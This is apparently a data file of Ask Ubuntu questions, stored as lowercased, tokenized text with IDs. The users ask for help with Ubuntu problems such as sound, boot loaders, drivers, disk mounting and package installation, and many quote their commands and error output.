335118	users language support in ubuntu 12.04	in my current desktop is supported 3 language pack : english , russian and ukrainian . but when another users is going to his account works only one - english . and any choice to change language or install new language pack . i tried did this through : sudo apt-get install language-support-ua or according this manual deb linux : how to add support for bulgarian , russian , belarusian , ukrainian , serbian , macedonian , bosnian language cyrillic localization to xfce , gnome , kde desktop . but resalt always looks like next : nazar_art @ nazar-desctop : /home/andriy $ sudo aptitude install language-support-ru could n't find any package whose name or description matched `` language-support-ru '' could n't find any package whose name or description matched `` language-support-ru '' no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 14 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . nazar_art @ nazar-desctop : /home/andriy $ apt-get install language-pack-ua e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? nazar_art @ nazar-desctop : /home/andriy $ sudo apt-get install language-pack-ua reading package lists ... done building dependency tree reading state information ... done e : unable to locate package language-pack-ua nazar_art @ nazar-desctop : /home/andriy $ sudo apt-get install -- yes language-pack-uk reading package lists ... done building dependency tree reading state information ... done language-pack-uk is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 14 not upgraded . nazar_art @ nazar-desctop : /home/andriy $ why this happen ? when i 'm going as root all 3 language are active but from another account only one by default and any chance to changing it . furthermore , does n't exist language flag at the right up corner . how to solve this trouble ? or how to make language support accessible for all users ?
335119	where does ubuntu store the cache of mac addresses for interface numbering ?	example : i run ubu in a vm . i remove and add several network cards . suddenly , i 'm at eth4 . i want to migrate this vm to openstack . how can i find/purge the mac address cache for interfaces , so a vm behaves as i would expect ?
335121	alias cd and ls with support for spaces and arguments	so i started with this discussion , and it basically does exactly what i want . however , the solution to preserve directory whitespace using quotes fails when using arguments , e.g . cd -p dir . any ideas for preserving whitespace and allowing for option flags ? this is the function i 'm currently using . function cd { new_directory= '' $ * '' ; if [ $ # -eq 0 ] ; then new_directory= $ { home } ; fi ; builtin cd `` $ { new_directory } '' & & ls ; } for example , with the above , cd -p my\ documents/ becomes cd `` -p my documents '' which obviously fails .
335124	how do i stop flash video being squashed and broken ?	i recently installed lubuntu but i have a problem with adobe flash player . i always see something that looks like this when i open a video : the video is small , grainy , and is green and purple . i tried to reinstall flash and to test it in multiple browsers without success . i installed an older version of flash but no result . [ 0300 ] : intel corporation 82865g integrated graphics controller [ 8086:2572 ] ( rev 02 ) subsystem : hewlett-packard company d530 sff ( dc578av ) [ 103c:12bc ] kernel driver in use : i915
335128	ubuntu keeps showing up in the boot even after deleting it	heyo , like the title says , ubuntu keeps showing up on the boot menu even after i have deleted the partition it was on ( i was dual booting it with windows 8 ) . i google 'd a bit and found out i had to download a program called easybcd and with it removing the ubuntu option in the boot list . so i did all of that but it still shows up on the boot menu ( and in the boot options in easybcd ) . this may also be the reason i can not install debian on my laptop , something i have been trying to do for 4 days now ( debian does n't show up on the boot meny , even after a succesful installation ) . if someone can tell me what is wrong , that would be beautiful . thanks .
335133	how can i prevent close session/shutdown/reboot when certain console program is executing ?	i want to disable close session/shutdown/reboot from gnome ( unity/lightdm ) when lftp is executing . is there any way ? perhaps with polkit ?
335135	can the asus tf700 run ubuntu ?	so i 'm thinking of getting the asus transformer infinity tf700 and i was wondering if it could run ubuntu . also i have heard that there are not many good apps for tablet android os , if i did get ubuntu would it have more apps ? what other benefits does ubuntu have over android ?
335139	how to add an admin to 13.04	through some way i have completely erased all accounts from my laptop . when i try to add a new admin account it asks for the root password . i 've tried my password from my previous account and it didnât work . what do i do to get an admin account back ? edit : i 'm logged in through a guest account right now . edit : i have access to recovery mode but i 'm not sure how to get into the root account . hasiya rulzz , i tried this but i do n't have any accounts to change the password on and it did n't work with the root account . edit : i am not able to download the rescue cd
335143	show window size while resizing or moving	in other desktop environments , it was possible to display the window size ( and position ) while resizing ( or moving ) the window . in xubuntu 12.04.2 , this feature was terminated . there are at least two use cases where this is quite useful : resizing the web browser to specific dimensions ( 1024x768 ) . comparing two pdfs where the content is scaled to fit page width . the first can be resolved using a plug-in for chrome or firefox . the second could be resolved using the wmctrl app . the convenience of having the location and dimensions always shown while moving or resizing is quite handy . rather than having multiple solutions , or having to run a command , it 'd be nice to have a solution integrated with the window manager . ensuring exact window sizes is more than obtuse pedantry . how would you get this functionality back ?
335148	how to set burg/grub2 resolution to 16:9 ratio ?	i have some problem with burg and grub2 resolution , my screen res is 1366*768 , i already set burg to 1366*768 , as displayed on vbeinfo , the resolution in boot menu does increase , but everything still seems stretched , round icons turned into ellipse , just like 4:3 image forced to fill entire 16:9 screen . so how do i fix this ?
335152	13.04 no sound ; sound applet shows dummy output	i upgraded to 13.04 and afterwards the sound wasnât working . when i look in the sound applet the only device listed is dummy output . i have looked online and i tried a couple solutions with no luck . i believe my sound card is being detected by the kernel but it is n't being used . lspci -v | grep -a7 -i `` audio '' 00:1b.0 audio device : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller ( rev 03 ) subsystem : aopen inc. device 0501 flags : bus master , fast devsel , latency 0 , irq 44 memory at d8200000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 1 ( rev 03 ) ( prog-if 00 [ normal decode ] ) here are the solutions i have tried : solution # 1 : did n't work sudo gedit /etc/default/speech-dispatcher changed run=yes to run=no rebooted solution # 2 : did n't work sudo alsa force-reload reboot solution # 3 : did n't work sudo apt-get remove -- purge alsa-base pulseaudio sudo apt-get install alsa-base pulseaudio sudo alsa force-reload reboot solution # 5 : did n't work and my nic and mouse stopped working sudo apt-get install linux-image-3.8.0-19-generic reboot solution # 6 : appears to work i had version 3.2.0-51 of the kernel installed from when i ran 12.04 , the last time the sound worked , so i rebooted and use grub to selected this version , now my sound works and the nic and mouse still work . additional info : my sound card is an on-board sound card , so the motherboard is an aopen i915pa-e r1.00 . pulseaudio -- check returns nothing pulseaudio -- dump-conf # # # read from configuration file : /etc/pulse/daemon.conf # # # daemonize = no fail = yes high-priority = yes nice-level = -11 realtime-scheduling = yes realtime-priority = 5 allow-module-loading = yes allow-exit = yes use-pid-file = yes system-instance = no local-server-type = user cpu-limit = no enable-shm = yes flat-volumes = no lock-memory = no exit-idle-time = 20 scache-idle-time = 20 dl-search-path = /usr/lib/pulse-3.0/modules default-script-file = /etc/pulse/default.pa load-default-script-file = yes log-target = auto log-level = notice resample-method = speex-float-1 enable-remixing = yes enable-lfe-remixing = no default-sample-format = s16le default-sample-rate = 44100 alternate-sample-rate = 48000 default-sample-channels = 2 default-channel-map = front-left , front-right default-fragments = 8 default-fragment-size-msec = 10 enable-deferred-volume = yes deferred-volume-safety-margin-usec = 1 deferred-volume-extra-delay-usec = 0 shm-size-bytes = 0 log-meta = no log-time = no log-backtrace = 0 rlimit-fsize = -1 rlimit-data = -1 rlimit-stack = -1 rlimit-core = -1 rlimit-rss = -1 rlimit-as = -1 rlimit-nproc = -1 rlimit-nofile = 256 rlimit-memlock = -1 rlimit-locks = -1 rlimit-sigpending = -1 rlimit-msgqueue = -1 rlimit-nice = 31 rlimit-rtprio = 9 rlimit-rttime = 1000000 amixer -c 0 simple mixer control 'pcm',0 capabilities : pvolume penum playback channels : front left - front right limits : playback 0 - 255 mono : front left : playback 223 [ 87 % ] [ -6.40db ] front right : playback 223 [ 87 % ] [ -6.40db ] simple mixer control 'beep',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 65 mono : front left : playback 59 [ 91 % ] [ 24.00db ] [ off ] front right : playback 59 [ 91 % ] [ 24.00db ] [ off ] pacmd dump-volumes welcome to pulseaudio ! use `` help '' for usage information . sink 0 : reference = 0 : 100 % 1 : 100 % , real = 0 : 100 % 1 : 100 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 100 % 1 : 100 % , save = no source 0 : reference = 0 : 100 % 1 : 100 % , real = 0 : 100 % 1 : 100 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 100 % 1 : 100 % , save = no
335153	problems with installing brother printer drivers .	i bought the brother printer dcp-j140 , and i am unable to install the printers for it . i am logged on as a the root user and everything . any help please ?
335158	share desktop via web browser	i need to share my desktop with users that do n't use linux . i 'm looking for a tool where users can hit a url in their browser and view my desktop , like join.me for windows . i tried running join.me via wine , but i get nothing but a black screen .
335174	amd drivers which one to install	so i am new to the whole ubuntu thing and im kinda clueless as to what amd driver i need to install to run dota 2 properly because at the moment the hud flickers whenever i activate an ability or item . i have three options ati fire gl , ati/amd proprietary fglrx graphics driver ( experimental beta ) , and ati/amd proprietary fglrx graphics driver ( post-release updates ) . if someone could tell me which one is the best to install that 'd be awesome . at this time i have the ati fire gl installed .
335177	problems with bcm4401-b0 ubuntu 12.04	i have been trying to get the wireless on my dell latitude d520 laptop working for a while now , and all the guides are here are of no help , the solutions i have tried are as follows : -adding the proprietary driver to the list of active drivers -installing bcmwl-kernel source adding the list to the drivers usually does nothing at all or wont install , and adding the bcmwl-kernal source knocks out my internet completely , i have to remove it through synaptic to get my internet to run again , but as of about 20 minutes ago my network button on the dash bar now says `` wireless networks device not ready ( firmware missing ) ubuntu 12.04 has never been able to read the wireless card in this laptop so i am thinking the problem is about 50 % fixed , i just have no idea how to get to 100 % from here , i can provide any information you guys need to help me with this , and all help will be greatly appreciated . edit : this link here has solved my problem and my wireless is now running just fine : i just install ubuntu 12.10 and my wirless adapter is n't working this is what i typed into terminal : '' sudo apt-get install linux-firmware-nonfree '' ( sorry no idea how to put into a little box like everyone else does ) let it install and then your wireless should be working just fine .
335187	space needed for a little more than basic ubuntu installation	i will want my basic dual boot ubuntu installation alongside windows to have the following : 1 . jdk 7.0 2 . android eclipse ide 3 . some basic video playing programs ( like vlc ) 4 . shell utilities ( i 'm not sure , but i believe some of the utilities need to be downloaded ) does 30gb space allocated to ubuntu in my windows laptop sound reasonable to achieve this ubuntu installation ?
335188	does anybody build the lastest sawfish version on lastest ubuntu dist ?	i want to run sawfish with emacs , but i find it that the default sawfish wm is too old , i try to build it from scratch , but i failed . so any tips ?
335189	nvidia 8600m gt `` broken randr detected ''	every time i try to run an application through wine i get a ton of messages saying err : winediag : xrandr12_init_modes broken nvidia randr detected , falling back to randr 1.0 . please consider using the nouveau driver instead . and then the application crashes . i suspect this is causing an x crash when i try to run steam as well , but i ca n't tell for sure . how can i solve this problem ? i am running ubuntu 13.04 amd64 .
335191	how to view packages provided by a ppa ?	how do i view packages provided by a specific ppa ? for example , i am trying to install the latest version of gnome-do , provided by the following ppa . ppa : do-testers/ppa however , i am unable to find the latest build . therefore i would like to search the available packages for the ppa so i can perform the install . thank you
335192	ca n't install python-dev . packages have unmet dependencies . i think it 's a wrong python version	root @ managementserver : ~ # sudo apt-get install python-pip python-dev build-essential -y reading package lists ... done building dependency tree reading state information ... done build-essential is already the newest version . build-essential set to manually installed . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : python-dev : depends : python ( = 2.6.6-3+squeeze7 ) but 2.7.3-4 is to be installed python-pip : depends : python-pkg-resources but it is not going to be installed depends : python-setuptools ( > = 0.6c1 ) but it is not going to be installed e : broken packages i am running ubuntu 13.04 server . i have tried : sudo apt-get update/upgrade sudo apt-get clean sudo apt-get -f install any ideas ? thanks !
335196	several indicator apps removed on 13.04 system tray	i recently upgraded from 12.10 to 13.04 and i know that during the upgrade ubuntu removed some of my indicator apps ( weather app , xpad , artha dictionary , banshee ) . can i still restore them on my system tray ? how ?
335197	nautilus stops working	i have done a silly things . some days ago i install dolphin in my ubuntu 12.04 . after that i was in love with dolphin for having thumbnail preview of folder with images inside . so , i thought of setting dolphin as a default file manager . so from the following link i found a solution : how to run dolphin instead of nautilus ? i have not followed the whole artical . just used the first code : sudo mv /usr/bin/nautilus /usr/bin/natilus.back & & sudo ln -s /usr/bin/dolphin /usr/bin/nautilus it makes my default file manager as dolphin . when i click to home folder launcher it now opens with dolphin . now i want to revert to nautilus . but i am not getting any way to go back . but i thought if i change the upper code it may revert . so , i changed it with : sudo mv /usr/bin/nautilus /usr/bin/natilus.back & & sudo ln -s /usr/bin/nautilus /usr/bin/dolphin and after that nautilus is not working . if i click home folder it also not working . if i write gksu nautilus in terminal it also not working after giving password . the only way that is left to access file manager is using dolphin . so , please help me . i need a solution . i need to make everything like before . now when i try to access mounted drive from launcher . it says : failed to execute child process `` /usr/share/applications/nautilus.desktop '' ( permission denied ) . please help me as soon as possible .
335198	unable to read my external hard drive	whenever i plug in my external hard drive it show a error as follows : # unable to mount 125 gb file system # error mounting : mount exited with exit code 13 : ntfs_mst_post_read_fixup_warn : magic : 0x00000000 size : 1024 usa_ofs : 0 usa_count : 65535 : invalid argument record 6 has no file magic ( 0x0 ) failed to open inode file_bitmap : input/output error failed to mount '/dev/sdb8 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . what does this mean ? ? ? please help ... ..thanks in advance ...
335205	ubuntu 12.04 lts wo n't boot after system crash + corrupt file system	late the other night , ubuntu crashed suddenly ( was n't doing anything unusual - just using firefox and audacity ) . i did n't catch the error message , and did n't think much of it - just went and rebooted - trying to boot the linux drive from grub ( i also have windows on another hd ) - it would n't load . neither would the recovery option . booted from the ubuntu 12.04 system disk , and used the `` try ubuntu '' option . could n't even mount the drive ubuntu is located on , though it shows up in fdisk -l. i ran sudo fsck -t ext4 -f /dev/sdb1 from terminal and got this message : jbd : failed to read block at offset 8480 fsck.ext4 : input/output error while recovering ext3 journal of /dev/sdb1 /dev/sdb1 : ***** file system was modified ***** /dev/sdb1 : ********** warning : filesystem still has errors ********** this allowed me to at least mount the drive , but not access much or boot from it - always got an error saying it could n't read file - kernel must be loaded first when i tried to boot . then i ran sudo fsck -t ext4 -y /dev/sdb1 - and it was fixing a ton of errors overnight like this in pass one - inodes that were part of a corrupted orphan linked list found . fix ? yes inode 56885569 was part of the orphaned inode list . fixed . there was around 100 of those fixed . went on to pass two and it was fixing a lot more errors ... entry 'ksocket-ehah ' in /tmp ( 9961473 ) has an incorrect filetype ( was 2 , should be 6 ) . fix ? yes ehah is my username on the system by the way . a lot of those errors do n't even show an entry name or directory location - just says entry ' ... ' in ? ? ? and said its missing ' ... '' in a directory inode . after pass two completed , it gave an error that said `` resize inode not valid `` and re-ran pass one . not sure what happened after this point ( i was just letting it run - the whole process took around 18 hours ) - but the final result was - /dev/sdb1 : ***** file system was modified ***** /dev/sdb1 : 262033/121610240 files ( 0.6 % non-contiguous ) , 45779164/486412288 blocks . still wo n't boot - and wo n't mount anymore when i 'm using the ubuntu live cd . no backup . any ideas how to get this working again , or at least save as much data as possible ? the drive was always unmounted when i was using the fsck command . when i try to mount the drive from the terminal , i get : mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so fdisk -l shows the following ( sda1 is a seperate drive with windows on it , that runs fine . ) device boot start end blocks id system /dev/sda1 * 63 2930255999 1465127968+ 7 hpfs/ntfs/exfat disk /dev/sdb : 2000.4 gb , 2000397852160 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907027055 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00003767 device boot start end blocks id system /dev/sdb1 * 2048 3891300351 1945649152 83 linux /dev/sdb2 3891302398 3907024895 7861249 5 extended partition 2 does not start on physical sector boundary . /dev/sdb5 3891302400 3907024895 7861248 82 linux swap / solaris
335207	extract zipx format in ubuntu	i compressed my folder using windows7 and it compressed to zipx format . how can i extract it in ubuntu 12.04 because it encountered error while extracting . when i google for it i came across this 'http : //www.westernwillow.com/cms/blog/franco/open-zipx-file-linux-ubuntu-or-mac-anything-other-windows-7 ' but it also gives me unsupprted error while installing . is their any other perfect solution .
335210	apt-get * wildcard with zsh	zsh : sudo apt-get remove -- purge ubuntuone-* error : zsh : no matches found : ubuntuone-* works on bash . what 's the problem ? : -d
335214	how to get arp tables from switch to server mysql database using snmp	i would like to obtain arp tables from a switch to a syslog server ( ubuntu 12.04 lts ) . i have done some research on how to do it and i decided to use snmp . i have done some research and i know that my server will be the manager whereas the switch will act as an agent.my problem is , i am not quite sure of the process of getting the arp tables and having them directed to the mysql database in my server .
335216	ubuntu 13.04 sound issue	i 've been messing with various builds from 12.04 ( lts ) to 12.10 to 13.04 ( and back and forth , doing fresh installs each time from a usb drive , wiping the old partitions off of my disk drive ) . i like features of 13.04 , but am having major issues not being able to get sound out of my hdmi interface ( since i use this pc exclusively as an htpc ) . i tried : going to the alsa launchpad , download the package : oem-audio-hda-daily-dkms* for my distribution ( raring ) , installed it , and rebooted . going to the mainline ubuntu kernels , downloaded version 3.8.8 , which is supposed to have a fix for this ; downloaded the latest version of the kernels for my architecture ( amd64 , all ) , installed it , and rebooted . through some of my prior runs , i 've done various other things including alsa force-reloads , etc . nothing seems to get it all working . here 's as much information as i can think of that i know of that would be relevant . if anyone can provide me with help to this issue , it would be much appreciated . $ uname -s & & uname -r & & uname -v & & uname -p & & uname -i & & uname -o linux 3.8.8-030808-generic # 201304170248 smp wed apr 17 06:49:45 utc 2013 x86_64 x86_64 gnu/linux $ aplay -l **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : 92hd73e1x5 analog [ 92hd73e1x5 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : 92hd73e1x5 digital [ 92hd73e1x5 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 9 : hdmi 3 [ hdmi 3 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 10 : hdmi 4 [ hdmi 4 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 11 : hdmi 5 [ hdmi 5 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 $ lspci 00:00.0 host bridge : intel corporation xeon e3-1200 v2/3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.4 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 5 ( rev c4 ) 00:1c.5 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 6 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation z75 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series/c210 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati cape verde xt [ radeon hd 7770 ghz edition ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati cape verde/pitcairn hdmi audio [ radeon hd 7700/7800 series ] 03:00.0 network controller : broadcom corporation bcm43225 802.11b/g/n ( rev 01 ) 04:00.0 ethernet controller : qualcomm atheros ar8161 gigabit ethernet ( rev 08 ) i ran alsamixer under sudo , and i saw that s/pdif was [ mm ] ( muted ) , but i unmuted it . the issue still persists . running something like : $ speaker-test -c 2 -r 48000 -d hw:0,1 for each of the devices from aplay -l gives me valid output but no sound for any device . for 0,1 , specifically , i get the following error : playback open error : -16 , device or resource busy . the rest do n't return an error , but just do n't output any sound . in response to the question about what drivers i am using , i have n't done anything special in regards to drivers , so i am using standard radeon drivers . here is the output of lshw -class sound : $ sudo lshw -class sound *-multimedia description : audio device product : cape verde/pitcairn hdmi audio [ radeon hd 7700/7800 series ] vendor : advanced micro devices [ amd ] nee ati physical id : 0.1 bus info : pci @ 0000:01:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:46 memory : f7e60000-f7e63fff *-multimedia description : audio device product : 7 series/c210 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:44 memory : f7f10000-f7f13fff thanks .
335219	how do i fix my ethernet card losing network connection every few minutes with kernels 3.8.x ?	i 'm using ubuntu 13.04 . my laptop is acer aspire one 722-c58rr , and my ethernet card works for a few seconds at a time with kernels 3.8.x , however , kernels 3.5.x and below worked fine . on kernels 3.8.x , it works fine after boot for about a minute , then it looses network connection . when pinging to some address , it says : network address is unreachable , but it can ping it 's own address . the address is statically configured . everything was working fine before . i went to vacation , where i used wifi and 3g connections , so i did n't notice that the problem occurred . came back home , plugged in into the ethernet . it worked for a minute then stopped . rebooting commutator fixed the problem . tried to connect to a different commutator , same problem . unplugging and plugging the cable fixes the problem for another minute . disconnecting eth in network manager and reconnecting it again , does the same thing . wifi has no such problem . tried to use a different cable that works fine on another computer , the same problem . tried to boot with the lower kernel version , the same problem was happening until i got to the version 3.5 of the kernel series . everything works fine on the kernel 3.5.x , but i do n't want to miss out on the new kernel 's features . executing commands , when booted with 3.8 kernel series , give the following results : lspci| grep -i eth : 06:00.0 ethernet controller : qualcomm atheros ar8152 v2.0 fast ethernet ( rev c1 ) dmesg| grep eth1 : [ 89.548291 ] atl1c 0000:06:00.0 : atl1c : eth1 nic link is up how do i fix it , while staying in the new kernel version ?
335221	can not access drives	my ubuntu was good somedays ago . now for some days i am having an error whenever i tried to access drives like c : \ , d : \ etc.. the error is : error mounting /dev/sda9 at /media/nihan/0296b5e196b5d4ff : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda9 '' `` /media/nihan/0296b5e196b5d4ff '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda9 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i have installed ubuntu alongside with windows 8 and it was good somedays ago . please help me .
335224	how to access hidden grub in xubuntu	i have recently installed xubuntu 12.04 alongside windows xp . my parents do n't use xubuntu , so i configured the grub file as written in some articles . i changed : grub_default= 4 # assuming windows is the fifth menu entry grub_timeout=0 grub_hidden_timeout=0 now whenever i press and hold the shift key it says grub loading , but does not show grub and boots directly into xp . how can i access grub.cfg to change the settings so i 'll have correct settings ?
335225	ubuntu does n't restart , but logs-out when restart button is pressed	the issues i am having with my ubuntu is that when i am going for a restart , from the tray icon - shutdown -- > restart , it does n't restart , but actually just logs out and gives me the ubuntu login screen again . i am having this issue since 3-4 days . before that it was n't happening . please advise . thanks in advance .
335227	trouble installing ubuntu server 12.04.2 lts with usb stick/key	i am trying to install ubuntu server 12.04 lts onto a new system using a usb-stick . i am to lazy to switch the only sata cd/dvd-rom device i have and use that . also , i just wanted to know whether this would be an interesting experience . not so far ... this is what happened : i created a new computer with following specs : cpu : amd athlon 2 x4 ( soc fm1 ) mobo : msi a55-p33 gpu : msi ati radeon r5450 ps : 400watt memory : 4gb no disk player this setup should do the trick . then i created a boot able usb stick using various tools pointed out to my by the support page from ubuntu itself on the subject on using usb keys and installing ubuntu . because early attempts failed , i tried more then one of them . i used a usb stick of 14gb . then i put in the usb key and started up . now , what is the problem ? i come into the setup menu , so the stick is being read . i see the normal choices like 'install ubuntu ' , 'install multiple servers using maas ' , 'memory test ' , 'disk check ' and the rest . whenever i try to use any of these , the screen turns black , and the computer resets . just like that . the only option from the menu that will work is the memory test . what am i doing wrong ? is something wrong with the key ? is something wrong with my install iso ( i used the same iso to burn on a disk , no problems there installing it ) ? is something wrong with my hardware setup ? i know i can always switch my cd/dvd-rom , but i 'd rather loose some more time trying to get this usb thing under way . edit : installed cd/dvd rom device and tried a working disk i burned earlier . some problem , after picking some menu option , screen turns black and computer resets .
335228	changes in apache config between 12.04.2 and 12.04.3 lts	so , today i updated a bunch of web servers from 12.04.2 to 12.04.3 and guess what , not a single vhost was working after the update . the main reasons were : in apache2.conf the line includeoptional sites-enabled/* was replaced by includeoptional sites-enabled/*.conf ok , no big deal . all the symlinks in our sites-enabled dirs were missing a .conf extension so those files would n't get included in the config . however , something the way apache handles access control changed between the versions as well . according to http : //httpd.apache.org/docs/2.4/upgrading.html # access i had to change order allow , deny allow from all in the vhost config to require all granted or include the mod_access_compat module . now , my question is ... i always felt that lts releases should be update-able without breaking anything . with that i mean the ability to run sudo apt-get -y update & & sudo apt-get -y upgrade & & sudo apt-get -y dist-upgrade without breaking anything . was that assumption wrong ? if so , where and how can i find out in advance what will happen the next time ? what i mean is , how do i find out that i will have to modify my apache / php / whatever config after updating ?
335229	no clue how to download skype onto asus 1015e	i recently bought an asus 1015e , but i have no idea how to correctly download skype . help !
335232	grub booting error	i am getting this grub rescue error no filesystem thing . i have read a lot of threads on this issue , but those solutions are not working . i tried live cd , and changed the booting option from hard disk to cd rom , but still i get the same grub rescue error . i have two operating systems , the other one is windows 7 . i formatted some part of my hard drive during which grub might have lost some files . i get that , but now what should i do ? please tell me how to deal with this thing : error unknown filesystem grub rescue help .
335235	how to change permission external hard drive in ubuntu 12.04	i want to copy any file to my external hard drive . but always when i tried to do this i have next output : cp : can not create regular file /media/nameofcard/ [ file ] ' : read only file system i also tried : sudo chmod -r 775 /media/nameofcard sudo chmod -r 777 /media/nameofcard but the same effect - ... read only file system update : after mount i have next output : nazar_art @ nazar-desctop : ~ $ mount /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sdb1 on /media/sdb1 type vfat ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/nazar_art/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=nazar_art ) any suggestions ? how to solve this trouble and let permission to copy and delete files to hard drive ?
335242	how to install an init.d script in ubuntu ?	i am trying to install an init.d script , to run celery for scheduling tasks . here is the steps i followed : copied the file celeryd and pasted it in folder /etc/init.d/ created a configuration file celeryd in folder /etc/default/ now when i tried to start it by sudo /etc/init.d/celeryd start , it throws error sudo : /etc/init.d/celeryd : command not found i googled about how to install init.d , i got this so-question . it says to issue a uname -a and when i does i get this : linux capsonesystem8-desktop 3.2.0-43-generic-pae # 68-ubuntu smp wed may 15 03:55:10 utc 2013 i686 i686 i386 gnu/linux and also it says use utils like insserv to enable init.d script so tried : insserv /etc/init.d/celeryd but it throws error insserv : command not found so i tried to install insserv sudo apt-get install insserv . but it say aleady installed : insserv is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 222 not upgraded . so how to install init.d script ? ? any help will be appreciated . update1 : when i tried : $ sh -x /etc/init.d/celeryd start it reveal some errors . may be that is why the service wonât start . update2 : i cleared all the errors when i run $ sh -x /etc/init.d/celeryd start but still sudo /etc/init.d/celeryd start throws command not found error
335255	after the installation could not see any option to boot ubuntu	i installed ubuntu 13.04 64bit as dual boot with windows 8 , uefi enabled and secureboot disabled in bios . after the installation could not see any option to boot ubuntu . only windows 8 boots . i also tried boot repair , please check the link i got during the boot repair completion : http : //paste.ubuntu.com/6009260/ please note , i have disable fast boot from windows 8 power options .
335265	hashtag and otherrs like at-key not working	i just in installed ubuntu yesterday but my hastag key and at-key are n't working ( and a few other keys . does anyone know what could be the problem ?
